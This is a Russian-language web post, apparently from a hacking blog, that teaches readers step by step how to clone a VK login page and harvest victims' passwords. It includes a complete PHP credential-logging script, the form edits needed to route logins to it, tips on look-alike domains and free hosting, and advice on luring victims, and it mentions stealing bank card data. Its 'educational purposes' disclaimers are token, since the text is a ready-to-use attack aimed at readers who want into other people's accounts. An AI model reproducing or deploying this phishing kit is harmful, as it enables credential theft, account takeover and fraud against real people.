top of page

Как угнать пароли жертвы через фейковый сайт

❌ Строго в ознакомительных целях. Вы научитесь создавать фишинговые сайты с нуля. Просто следуйте инструкции и у вас получиться, даже если вы совсем новичок.

Всем салют, дорогие друзья!

Уверен, что вам хотя бы однажды приходила в голову мысль на подобии: “как мне получить доступ к чужому VK, Instagram, почте и прочим учеткам?”.


⚡️ Спешу вас обрадовать: ничего особо сложного в этом нет. Эта статья - именно то, что вам нужно. Инструкция приведенная здесь - универсальная и может быть использована для создания фишинговой копии любого сайта.

  • Для начала, если вы совсем новичок, напомню, что такое фишинг:

Фишинг (англ. phishing от fishing «рыбная ловля, выуживание») — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям.


Ну, а теперь давайте начнём...

Важная ремарка: статья написана в строго образовательных целях. Я не призываю вас к противозаконным действиям. Вся ответственность за ваши поступки будет лежать исключительно на вас.
 

Копирование​ сайта

Для начала нам необходимо скопировать оригинальную страницу, чтобы наша получилась идентичной настоящей.


Это нужно для того, чтобы пользователь зашедший туда, увидел привычную и знакомую форму входа и без лишних размышлений ввёл свой логин и пароль.


✅ Предлагаю рассмотреть все на примере создания фейковой страницы VK

  • Для начала создаём для нашего фейка отдельную папку на компьютере. Туда мы и будем скидывать все нужные для него файлы.

  • Далее открываем нужный нам сайт в браузере и заходим на страницу авторизации

  • Теперь сохраняем эту страницу: правая кнопка мыши -> Cохранить как...

  • В появившемся окне выбираем тип сохраняемого файла: Веб-страница полностью. В имени файла пишем index.htm

Теперь давайте разбираться с кодом...

 

Разбираемся в HTML

  • С помощью блокнота открываем исходный код сохраненной страницы index.htm

Множество странных и непонятных закорючек - это исходный код страницы.

Как говорится “глаза бояться, а руки делают”, поэтому не бойтесь и начинайте работать :)

Помните, когда мы с вами сохраняли страницу, рядом с полем для ввода логина и пароля наверняка были подписи (логично предположить, что там было написано "логин" и "пароль")? Вот по ним и будем ориентироваться.

  • Ищем среди всего этого безобразия данные слова. Рядом с ними на странице у нас располагались поля ввода логина и пасса. В html коде они будут выглядеть примерно вот так:

<input type="text" name="login" value="" ......  
<input type="password" name="password" ......

Имена полей (в коде идут после "name=") не всегда будут именно login и password. Где-то это могут быть e-mail и pass , а где-то и username, parol.(оформление и названия зависит от кодера и сайта)

P.S. Блок с надписями "логин", "пароль" и формами ввода почти всегда находится в тэге <form>.
  • Временно записываем или запоминаем имена этих паролей

  • Ищем через Ctrl+F запрос «action»

<form name="login" [U]action="users/passcheck.php"[/U] method="post" onsubmit="return check();">
  • Меняем строку и прописываем параметру action значение login.php (если параметра action там нет - введите его сами: action="login.php")

  • Ищем параметр method (в той же строчке что form и action) и ставим ему значение “post” или “get”

  • Сохраняемся и закрываем.

 

Волшебный скрипт​

🔥 Наш скрипт будет выполнять самую важную функцию – перехват и запись введенных жертвой логина и пароля.

  • Вот его код:

<?PHP  $Log = $_POST['login'];  $Pass = $_POST['password'];  $log = fopen("database.txt","at");  fwrite($log,"\n $Log:$Pass \n");  fclose($log);  echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://lleo.aha.ru/na/'></head></html>";  ?>


✅ А теперь давайте по полочкам:

  1. В первых двух строках переменным Log и Pass присваиваются значения соответствующих полей из предыдущего файла. Именно для этого мы записывали названия полей с сохранённой страницы: мы должны указать их скрипту. Меняем login и password из квадратных скобок на то, как были названы поля ввода на нашей сохранённой странице (Кавычки не трогаем!).

  2. В третьей строке происходит открытие файла database.txt для записи. (Можете назвать этот файл, как хотите, хоть I_love_Hacker_Place.txt)

  3. Главное - не забудьте, как назвали (название должно быть написано английскими буквами) и создайте текстовый документ с таким именем в папке с фейком.

  4. Четвёртая строка - запись в файл строки вида \n $Log:$Pass \n, где \n - переход на новую строку, $Log:$Pass - значения переменных с логином и паролем, записанные через двоеточие.

  5. Строка пятая - сохранение, закрытие файла.

  6. Последняя строка - редирект (переадресация) на другую страницу (пока жертва не просекла, что это фейк). В этой строчке после URL= вписываем адрес страницы, куда попадёт пользователь сразу после того, как введёт логин и пароль (и снова будьте аккуратны с кавычкой после адреса - она должна там быть!). Лучше всего отправить его на настоящую страницу (ну, откуда там вы страничку копировали?) с сообщением о вводе неверного пароля. Тогда бедолага решит что что-то не так ввёл, попробует снова и зайдёт, ничего не заподозрив!

  • Сохраняем файл с именем login.php в папку с фейком.

 

Запускаем фейк в сеть!

  • Нам понадобится бесплатный хостинг с поддержкой php. Например:

🌐 Freehostia

🌐 HostiMan.ru

🌐 Free.beget.ru

🌐 Free.sprinthost.ru

🌐 HyperHost.ua

🌐 Hostronavt.ru

🌐 Hostkoss.com

  • Регистрируем домен на этом хосте с названием, максимально похожим на адрес страницы, которую мы подделываем (например vk.login.com), чтобы нашей цели не бросалось в глаза.

  • Качаем Filezilla или любой другой файловый менеджер, открываем:

  • Подключаем полученный хост через Filezilla

Слева видим все папки и файлы нашего компьютера, справа – наш сервер. Осталось его только дополнить

  • Перекидываем все сохраненные файлы нашей фишинговой страницы на новоиспеченный сайт.

  • Создаем текстовый файл “database.txt(В нем и будут сохраняться все введенные логины и пароли в виде: “log : pass”)

Вместо localhost будем открывать тот адрес, который мы зарегистрировали. Соответственно, файл с сохранёнными паролями будет находиться там же (http://наш_адрес/database.txt).

  • В том же файловом менеджере ставим файлу максимальные права доступа – 777

  • Готово!

Теперь наш фишинговый сайт можно использовать в разных целях, но остался один главный шаг.

 

Социальная часть​

Самый сложный и творческий этап. Придется импровизировать, как заманить жертву на фейк. Все зависит от тематики и интересов жертвы. Писать на почту, в другие мессенджеры, да хоть голубем эту ссылку отправляйте. Это полностью ваша фантазия, в которой вам помогут навыки социальной инженерии.


Итог:

✅ Вы научились создавать фейковые страницы для любого сайта и теперь можете заимствовать пароли (или даже банковские карты)

✅ По этой схеме можно создавать фейки за 10 минут





2 094 просмотра

Недавние посты

Смотреть все
bottom of page